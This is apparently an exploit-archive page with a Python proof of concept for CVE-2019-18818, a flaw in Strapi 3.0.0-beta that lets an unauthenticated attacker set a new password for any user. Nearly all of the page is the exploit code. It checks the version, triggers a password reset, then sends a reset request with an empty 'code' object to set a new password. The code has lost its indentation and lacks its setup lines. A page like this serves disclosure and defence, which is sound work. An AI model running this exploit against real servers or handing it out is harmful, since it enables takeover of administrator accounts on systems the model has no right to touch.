Strapi 3.0.0beta set password (unauthenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-08-30 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Strapi 3.0.0beta set password (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818
# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
# Password reset
print("[*] Password reset for user: {}".format(userEmail))
resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)}
s.post("{}/".format(strapiUrl), json=resetPasswordReq)
# Set new password
print("[*] Setting new password")
exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword}
r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)
# Check if the password has changed
if "username" in str(r.content):
print("[+] New password '{}' set for user {}".format(newPassword, userEmail))
else:
print("\033[91m[-] Something went wrong\033[0m")
sys.exit(1)
else:
print("\033[91m[-] This version is not vulnerable\033[0m")
sys.exit(1)